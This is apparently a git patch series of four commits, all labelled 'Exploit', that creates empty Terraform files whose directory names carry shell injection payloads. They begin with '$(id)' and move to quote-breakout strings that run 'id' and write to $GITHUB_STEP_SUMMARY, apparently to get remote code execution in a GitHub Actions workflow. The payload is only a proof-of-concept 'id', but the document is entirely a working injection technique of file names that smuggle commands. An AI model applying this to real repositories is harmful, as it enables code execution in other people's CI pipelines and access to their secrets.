From f01c4e0c7102ae396eda99ab630cd2575f107c9e Mon Sep 17 00:00:00 2001 From: OxBat Date: Thu, 8 Jan 2026 03:11:07 +0100 Subject: [PATCH 1/4] Exploit: RCE verification --- infrastructure/$(id)/terraform/main.tf | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 infrastructure/$(id)/terraform/main.tf diff --git a/infrastructure/$(id)/terraform/main.tf b/infrastructure/$(id)/terraform/main.tf new file mode 100644 index 0000000..e69de29 From 99559ded488763cff528fc78608c9c88558a0474 Mon Sep 17 00:00:00 2001 From: OxBat Date: Thu, 8 Jan 2026 03:15:19 +0100 Subject: [PATCH 2/4] Exploit: Add missing tfvars to reach the sink --- infrastructure/$(id)/terraform/terraform.tfvars | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 infrastructure/$(id)/terraform/terraform.tfvars diff --git a/infrastructure/$(id)/terraform/terraform.tfvars b/infrastructure/$(id)/terraform/terraform.tfvars new file mode 100644 index 0000000..e69de29 From d75c30f4d821be3e9d6f4957fba33ab3a36817cd Mon Sep 17 00:00:00 2001 From: OxBat Date: Thu, 8 Jan 2026 03:25:56 +0100 Subject: [PATCH 3/4] Exploit: Command injection via quote breakout --- .../\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" | 0 .../terraform/terraform.tfvars" | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename infrastructure/$(id)/terraform/main.tf => "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" (100%) rename infrastructure/$(id)/terraform/terraform.tfvars => "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars" (100%) diff --git a/infrastructure/$(id)/terraform/main.tf "b/infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" similarity index 100% rename from infrastructure/$(id)/terraform/main.tf rename to "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/main.tf" diff --git a/infrastructure/$(id)/terraform/terraform.tfvars "b/infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars" similarity index 100% rename from infrastructure/$(id)/terraform/terraform.tfvars rename to "infrastructure/\"; id >> $GITHUB_STEP_SUMMARY ; #/terraform/terraform.tfvars" From 1c0d1c1a8bf415cd090224e1732a1fa5dacf0b69 Mon Sep 17 00:00:00 2001 From: OxBat Date: Thu, 8 Jan 2026 03:29:41 +0100 Subject: [PATCH 4/4] Exploit: Final quote breakout for RCE --- .../poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" | 0 .../terraform/terraform.tfvars" | 0 2 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 "infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" create mode 100644 "infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars" diff --git "a/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" "b/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/main.tf" new file mode 100644 index 0000000..e69de29 diff --git "a/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars" "b/infrastructure/poc\";id>>$GITHUB_STEP_SUMMARY;echo \"done/terraform/terraform.tfvars" new file mode 100644 index 0000000..e69de29